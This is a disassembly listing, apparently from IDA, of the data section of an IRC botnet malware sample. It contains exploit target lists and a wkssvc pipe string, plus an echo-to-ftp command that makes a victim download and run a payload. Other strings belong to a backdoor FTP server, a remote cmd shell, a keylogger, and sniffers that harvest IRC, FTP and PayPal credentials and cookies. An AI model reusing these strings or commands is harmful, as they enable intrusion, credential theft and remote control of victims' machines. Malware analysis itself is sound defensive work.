aWindowsNlSp12 db 'Windows nl sp1 2',0
align 10h
aWindowsNlSp11 db 'Windows nl sp1 1',0
align 4
aWindowsXpSp01E db 'Windows XP SP0+1 ENG',0 ; DATA XREF: .data:00441410�o
align 4
aWindowsXpSp01G db 'Windows XP SP0+1 GER+NL+IT+FR',0
align 4
dword_433F2C dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; DATA XREF: sub_410F37+256�o
dword_433F40 dd 6BFFD098h, 3610A112h, 0C3463398h, 5A347EF8h, 0
; DATA XREF: sub_410F37+20C�o
; char aSPipeWkssvc[]
aSPipeWkssvc db '\\%s\pipe\wkssvc',0 ; DATA XREF: sub_410F37+1B5�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_411555+12D�o
; sub_41C9D4+1F�o
; char aEchoOpenSDOE_0[]
aEchoOpenSDOE_0 db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o'
; DATA XREF: sub_411722+27C�o
db ' &echo bye >>o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
; char asc_433FE0[]
asc_433FE0 db '-' ; DATA XREF: sub_411722+20E�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aClientConnecti db '- Client connection from IP: %s:%d.',0
align 4
; char asc_434018[]
asc_434018 db '-' ; DATA XREF: sub_411722+F1�o
; sub_411722+172�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aErrorBindFaile db '- Error: bind() failed, returned: <%d>.',0
align 4
; char asc_434054[]
asc_434054 db '-' ; DATA XREF: sub_411722+6B�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aErrorSocketFai db '- Error: socket() failed, returned: <%d>.',0
align 10h
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_411B17+5B7�o
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_411B17+599�o
align 10h
; char asc_4340D0[]
asc_4340D0 db '-' ; DATA XREF: sub_411B17+548�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 3
db 2, 2Dh, 20h
aSentFileToS db 'sent file to %s',0
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_411B17+536�o
; char asc_434104[]
asc_434104 db '-' ; DATA XREF: sub_411B17+4EC�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 3
db 2, 2Dh, 20h
aStartingTransf db 'starting transfer to %s',0
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_411B17+4C3�o
align 4
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_411B17+4AB�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_411B17+49E�o
align 4
; char aS_S_S_S[]
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_411B17+48D�o
; char aXX[]
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_411B17+45A�o
align 10h
; char aS_2[]
aS_2 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_411B17+416�o
db ']',0
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_411B17+3DD�o
align 10h
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_411B17+3BC�o
align 4
; char aList_0[]
aList_0 db 'LIST',0 ; DATA XREF: sub_411B17+3A8�o
align 10h
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_411B17+371�o
align 4
; char aPasv[]
aPasv db 'PASV',0 ; DATA XREF: sub_411B17+35D�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_411B17+350�o
; char aI_0[]
aI_0: ; DATA XREF: sub_411B17+33C�o
; .data:00442F50�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_411B17+318�o
; char aA_0[]
aA_0: ; DATA XREF: sub_411B17+304�o
; .data:00442F5C�o
unicode 0, <A>,0
; char aType[]
aType db 'TYPE',0 ; DATA XREF: sub_411B17+2ED�o
; sub_411B17+325�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_411B17+2E0�o
align 4
; char off_43426C[]
off_43426C dd offset dword_445750 ; DATA XREF: sub_411B17+2CC�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_411B17+2BF�o
align 4
; char aRest[]
aRest db 'REST',0 ; DATA XREF: sub_411B17+2AB�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_411B17+29E�o
align 4
; char aSyst[]
aSyst db 'SYST',0 ; DATA XREF: sub_411B17+28A�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_411B17+27D�o
align 4
; char aPass_0[]
aPass_0 db 'PASS',0 ; DATA XREF: sub_411B17+269�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_411B17+25C�o
align 4
; char aUser_1[]
aUser_1 db 'USER',0 ; DATA XREF: sub_411B17+247�o
align 4
; char aSS_3[]
aSS_3 db '%s %s',0 ; DATA XREF: sub_411B17+239�o
align 4
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_411B17+1BE�o
align 4
; char aFoundIFilesAnd[]
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_412135+64D�o
align 10h
; char aTrTdColspan3_0[]
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_412135+638�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
; char aPrivmsgSFoundS[]
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_412135+61D�o
align 4
; char a31s21sIBytes[]
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_412135+58E�o
align 8
; char aTdTdWidthDCo_0[]
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_412135+566�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
; char aCodeSCodeA_0[]
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_412135:loc_412658�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_412135+51C�o
align 4
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_412135+476�o
align 10h
; char a31s21s[]
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_412135+439�o
align 10h
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_412135+406�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aCodeSCodeA[]
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_412135:loc_412502�o
align 10h
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_412135+3C6�o
align 10h
; char aSS_4[]
aSS_4 db '%s%s/',0 ; DATA XREF: sub_412135+379�o
align 4
; char aTrTdWidthDAHre[]
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_412135+335�o
; sub_412135+48B�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
; char aPrivmsgS31s21s[]
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_412135+308�o
align 4
; char aS_3[]
aS_3 db '<%s>',0 ; DATA XREF: sub_412135+2DE�o
; sub_412135+418�o
align 4
; char a2_2d2_2d4d2_2d[]
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_412135+2B4�o
aAm db 'AM',0 ; DATA XREF: sub_412135+293�o
align 10h
aPm_0 db 'PM',0 ; DATA XREF: sub_412135+288�o
align 4
; char a__[]
a__ db '..',0 ; DATA XREF: sub_412135+231�o
align 4
; char aTrTdColspan3AH[]
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_412135+1BF�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aSearchingForS[]
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_412135:loc_412276�o
; char aTrTdColspan3Hr[]
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_412135+12A�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
; char aTrTdWidthDCode[]
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_412135+F2�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aH1IndexOfSH1Ta[]
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_412135+AC�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
; char aHtmlHeadTitleI[]
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_412135+6E�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
; char aPrivmsgSSearch[]
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_412135+45�o
; char aSSHttp1_1Refer[]
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_4128A1+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
; char aHttp1_0200Ok_0[]
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_4129C2+E3�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
; char aHttp1_0200OkSe[]
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_4129C2+C9�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_4129C2+93�o
; sub_41D779+17D�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_4129C2+7A�o
align 4
; char aApplicationOct[]
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_4129C2:loc_412A29�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_4129C2+60�o
align 4
; char asc_4349C4[]
asc_4349C4 db '-' ; DATA XREF: sub_412B2A+27C�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_37 db ' failed to start worker thread, error %d',0
align 4
; char asc_4349FC[]
asc_4349FC db '-' ; DATA XREF: sub_412B2A+20A�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aWorkerThreadOf db ' worker thread of server thread: %d.',0
align 10h
; char asc_434A30[]
asc_434A30 db '*',0 ; DATA XREF: sub_412B2A+156�o
align 4
aS_9 db '\%s',0 ; DATA XREF: sub_412B2A+2F�o
; char asc_434A38[]
asc_434A38 db '-' ; DATA XREF: sub_412DD9+3E3�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerFailedRe db ' server failed, returned %d',0
; char asc_434A60[]
asc_434A60 db 0Dh,0Ah,0 ; DATA XREF: sub_412DD9+2C0�o
; sub_41D235+E9�o
align 4
; char aGet_0[]
aGet_0 db 'GET ',0 ; DATA XREF: sub_412DD9+25A�o
align 4
; char asc_434A6C[]
asc_434A6C db '-' ; DATA XREF: sub_41321D+180�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aServerFailed_0 db '- server failed, returned %d',0
align 4
; char aUseridUnixS[]
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: sub_41321D+113�o
; char asc_434AB0[]
asc_434AB0 db '-' ; DATA XREF: sub_41321D+BB�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aClientConnec_0 db '- client connection from %s:%d.',0
align 10h
; char asc_434AE0[]
asc_434AE0 db '-' ; DATA XREF: sub_413483+159�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aFailedToSta_38 db 'Failed to start connection thread, error: <%d>.',0
; char asc_434B20[]
asc_434B20 db '-' ; DATA XREF: sub_413483+E3�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aClientConnec_1 db 'Client connection to IP: %s:%d, Server thread: %d.',0
align 4
; char asc_434B64[]
asc_434B64 db '-' ; DATA XREF: sub_41366C+14D�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToSta_39 db 'Failed to start client thread, error: <%d>.',0
; char asc_434BA0[]
asc_434BA0 db '-' ; DATA XREF: sub_41366C+EB�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aClientConnec_2 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 4
; char asc_434BE8[]
asc_434BE8 db '-' ; DATA XREF: sub_4137FD:loc_41382F�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aProtocolString db '- Protocol string too long.',0
align 4
; char asc_434C14[]
asc_434C14 db '-' ; DATA XREF: sub_413848+178�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aLoginRejectedR db '- Login rejected, Remote user: <%s@%s>.',0
align 4
; char asc_434C4C[]
asc_434C4C db '-' ; DATA XREF: sub_413848+1EC�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedOutS db '- User logged out: <%s@%s>.',0
align 4
; char asc_434C78[]
asc_434C78 db '-' ; DATA XREF: sub_413848+1CC�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorSessionru db '- Error: SessionRun(): <%d>.',0
align 4
; char asc_434CA4[]
asc_434CA4 db '-' ; DATA XREF: sub_413848+1AC�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedInS@ db '- User logged in: <%s@%s>.',0
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_413848+188�o
align 10h
; char asc_434CE0[]
asc_434CE0 db '-' ; DATA XREF: sub_413848+F1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorGetpeerna db '- Error: getpeername(): <%d>.',0
align 4
; char asc_434D0C[]
asc_434D0C db '-' ; DATA XREF: sub_413A51+21C�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorServerFai db '- Error: server failed, returned: <%d>.',0
align 4
; char asc_434D44[]
asc_434D44 db '-' ; DATA XREF: sub_413A51+1D0�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_40 db '- Failed to start client thread, error: <%d>.',0
align 10h
; char asc_434D80[]
asc_434D80 db '-' ; DATA XREF: sub_413A51+15F�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aClientConnec_3 db '- Client connection from IP: %s:%d, Server thread: %d.',0
unk_434DC4 db 2Dh ; - ; DATA XREF: sub_413A51+106�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aReadyAndWaitin db '- Ready and waiting for incoming connections.',0
align 10h
; char asc_434E00[]
asc_434E00 db '-' ; DATA XREF: sub_413A51+72�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToInstal db '- Failed to install control-C handler, error: <%d>.',0
align 4
; char asc_434E44[]
asc_434E44 db '-' ; DATA XREF: sub_413A51+40�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorWsastartu db '- Error: WSAStartup(): <%d>.',0
align 10h
; char asc_434E70[]
asc_434E70 db '-' ; DATA XREF: sub_413CD4+BF�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExecut db '- Failed to execute shell, error: <%d>.',0
align 4
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_413CD4+88�o
align 10h
; char asc_434EB0[]
asc_434EB0 db '-' ; DATA XREF: sub_413DA8+89�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aSessionreadshe db '- SessionReadShellThread exited, error: <%ld>.',0
unk_434EEC db 2Dh ; - ; DATA XREF: sub_413F5A+B2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExec_0 db '- Failed to execute shell.',0
; char asc_434F14[]
asc_434F14 db '-' ; DATA XREF: sub_413F5A+82�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCreate db '- Failed to create shell stdin pipe, error: <%d>.',0
align 8
unk_434F58 db 2Dh ; - ; DATA XREF: sub_413F5A+5F�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_0 db '- Failed to create shell stdout pipe, error: <%d>.',0
; char asc_434F98[]
asc_434F98 db '-' ; DATA XREF: sub_414056+E2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aWaitformultipl db '- WaitForMultipleObjects error: <%d>.',0
align 10h
; char asc_434FD0[]
asc_434FD0 db '-' ; DATA XREF: sub_414056+59�o
; sub_414056+8F�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_1 db '- Failed to create ReadShell session thread, error: <%d>.',0
align 4
; char dword_435018[]
dword_435018 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4142A9+186�o
aErrorFailedToC db '- Error: Failed to connect to target, returned: <%d>.',0
align 4
dword_43505C dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4142A9+166�o
aErrorFailedToO db '- Error: Failed to open socket(), returned: <%d>.',0
align 4
; char dword_43509C[]
dword_43509C dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4142A9+C6�o
aAuthentication db '- Authentication failed. Remote userid: %s != %s.',0
align 4
; char asc_4350DC[]
asc_4350DC db '-' ; DATA XREF: sub_4144B2+1A4�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aFailedToSta_41 db '- Failed to start server on Port %d.',0
align 10h
; char asc_435110[]
asc_435110 db '-' ; DATA XREF: sub_4144B2+16F�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aFailedToSta_42 db '- Failed to start client thread, error: <%d>.',0
align 10h
; char asc_435150[]
asc_435150 db '-' ; DATA XREF: sub_4144B2+10A�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aClientConnec_4 db '- Client connection from IP: %s:%d, Server thread: %d.',0
align 4
dword_435194 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_4146A1+417�o
; char asc_4351A0[]
asc_4351A0 db '-' ; DATA XREF: sub_4146A1+3C5�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFileSentToS db ' file sent to %s',0
align 10h
; char asc_4351C0[]
asc_4351C0 db '-' ; DATA XREF: sub_4146A1+2E3�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aSendingDataPac db ' sending data packets to %s',0
; char asc_4351E8[]
asc_4351E8 db '-' ; DATA XREF: sub_4146A1+170�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToOpenFi db ' Failed to open file: %s.',0
align 10h
; char asc_435210[]
asc_435210 db '-' ; DATA XREF: sub_4146A1+64�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aErrorSocketF_0 db ' Error: socket() failed, returned: <%d>.',0
align 4
; char asc_435248[]
asc_435248 db '-' ; DATA XREF: sub_414B1C+AC�o
byte_435249 db 3, 34h, 2 ; DATA XREF: .rdata:off_4352CC�o
dd 6C79656Bh, 302676Fh, 7325202Dh, 0
; char aDDDDDDS[]
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_414B1C+86�o
align 4
; char aSReturnS[]
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_414BFB+21B�o
align 4
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_414BFB+1D8�o
align 4
; char aSChangedWindow[]
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_414BFB+8E�o
align 10h
aHttp_0 db 'HTTP',0 ; DATA XREF: .data:0044223C�o
align 4
aFtp db 'FTP',0 ; DATA XREF: .data:00442238�o
off_4352CC dd offset byte_435249 ; DATA XREF: .data:00442234�o
dword_4352D0 dd 544F42h ; DATA XREF: .data:off_442230�o
; char asc_4352D4[]
asc_4352D4 db '-' ; DATA XREF: sub_414ECA+277�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aRecvFailedRetu db '- recv() failed, returned %d',0
align 10h
; char asc_435300[]
asc_435300 db '-' ; DATA XREF: sub_414ECA+204�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aSuspiciousSPac db '- suspicious %s packet from: %s:%d - %s',0
; char asc_435334[]
asc_435334 db '-' ; DATA XREF: sub_414ECA+18E�o
db 3, 34h, 2
dd 696E7370h, 3026666h, 2Dh
; char aPsniff_0[]
aPsniff_0 db '[PSNIFF]',0 ; DATA XREF: sub_414ECA+173�o
align 10h
dword_435350 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_414ECA+139�o
aWsaioctlFailed db '- WSAIoctl() failed, returned %d',0
align 10h
; char asc_435380[]
asc_435380 db '-' ; DATA XREF: sub_414ECA+F1�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aBindFailedRetu db '- bind() failed, returned %d',0
align 4
; char asc_4353AC[]
asc_4353AC db '-' ; DATA XREF: sub_414ECA+82�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aSocketFailedRe db '- socket() failed, returned %d',0
align 4
; char aHashin[]
aHashin db ':!hashin',0 ; DATA XREF: sub_41519E+103�o
align 4
; char a_hashin[]
a_hashin db ':.hashin',0 ; DATA XREF: sub_41519E+EE�o
align 10h
; char aIdent_0[]
aIdent_0 db ':!ident',0 ; DATA XREF: sub_41519E+D9�o
; char a_ident[]
a_ident db ':.ident',0 ; DATA XREF: sub_41519E+C8�o
; char a_login_1[]
a_login_1 db ':.Login',0 ; DATA XREF: sub_41519E+B7�o
; char aLogin_1[]
aLogin_1 db ':!Login',0 ; DATA XREF: sub_41519E+A6�o
; char aLogin_0[]
aLogin_0 db ':!login',0 ; DATA XREF: sub_41519E+95�o
; char a_login_0[]
a_login_0 db ':.login',0 ; DATA XREF: sub_41519E+84�o
; char a366[]
a366 db '366 ',0 ; DATA XREF: sub_41519E+73�o
align 4
; char a302[]
a302 db '302 ',0 ; DATA XREF: sub_41519E:loc_415200�o
align 10h
; char aJoin_0[]
aJoin_0 db 'JOIN #',0 ; DATA XREF: sub_41519E+4D�o
align 4
; char aPsniff_2[]
aPsniff_2 db 'PSNIFF//',0 ; DATA XREF: sub_41519E+3C�o
align 4
; char aPsniff_1[]
aPsniff_1 db '[PSNIFF]:',0 ; DATA XREF: sub_41519E+2B�o
align 10h
; char aBotSniff[]
aBotSniff db 'Bot sniff',0 ; DATA XREF: sub_41519E+5�o
align 4
; char aYouAreNowAnIrc[]
aYouAreNowAnIrc db 'You are now an IRC Operator',0 ; DATA XREF: sub_4152B5+62�o
; char aOper_0[]
aOper_0 db 'oper ',0 ; DATA XREF: sub_4152B5+51�o
align 10h
; char aNick_1[]
aNick_1 db 'NICK ',0 ; DATA XREF: sub_4152B5:loc_4152F5�o
; sub_41532B+2B�o
align 4
; char aOper[]
aOper db 'OPER ',0 ; DATA XREF: sub_4152B5+2B�o
align 10h
; char aIrcSniff[]
aIrcSniff db 'IRC sniff',0 ; DATA XREF: sub_4152B5+5�o
align 4
; char aPass_1[]
aPass_1 db 'PASS ',0 ; DATA XREF: sub_41532B+73�o
align 4
; char aUser_2[]
aUser_2 db 'USER ',0 ; DATA XREF: sub_41532B+62�o
align 4
; char a230[]
a230 db '230 ',0 ; DATA XREF: sub_41532B:loc_41537C�o
align 4
; char a220[]
a220 db '220 ',0 ; DATA XREF: sub_41532B+3C�o
align 4
; char aFtpSniff[]
aFtpSniff db 'FTP sniff',0 ; DATA XREF: sub_41532B+5�o
align 4
; char aSetCookie[]
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: sub_4153B2+73�o
; char aPaypal_com_0[]
aPaypal_com_0 db 'paypal.com',0 ; DATA XREF: sub_4153B2+62�o
align 10h
; char aPaypal_com[]
aPaypal_com db 'PAYPAL.COM',0 ; DATA XREF: sub_4153B2+51�o
align 4
; char aPaypal_0[]
aPaypal_0 db 'PAYPAL',0 ; DATA XREF: sub_4153B2:loc_4153F2�o
align 4
; char aPaypal[]
aPaypal db 'paypal',0 ; DATA XREF: sub_4153B2+2B�o
align 4
; char aHttpSniff[]
aHttpSniff db 'HTTP sniff',0 ; DATA XREF: sub_4153B2+5�o
align 4
; char aOpenssh_2[]
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_415439+51�o
align 4
; char aServUFtpServer[]
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_415439:loc_415479�o
align 4
; char aOpenssl0_9_6[]
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_415439+2B�o
align 4
; char aVulnSniff[]
aVulnSniff db 'VULN sniff',0 ; DATA XREF: sub_415439+5�o
align 4
unk_435544 db 2Dh ; - ; DATA XREF: sub_41549E+380�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVulnSniffSDToS db '- VULN sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
; char asc_43557C[]
asc_43557C db '-' ; DATA XREF: sub_41549E+31C�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
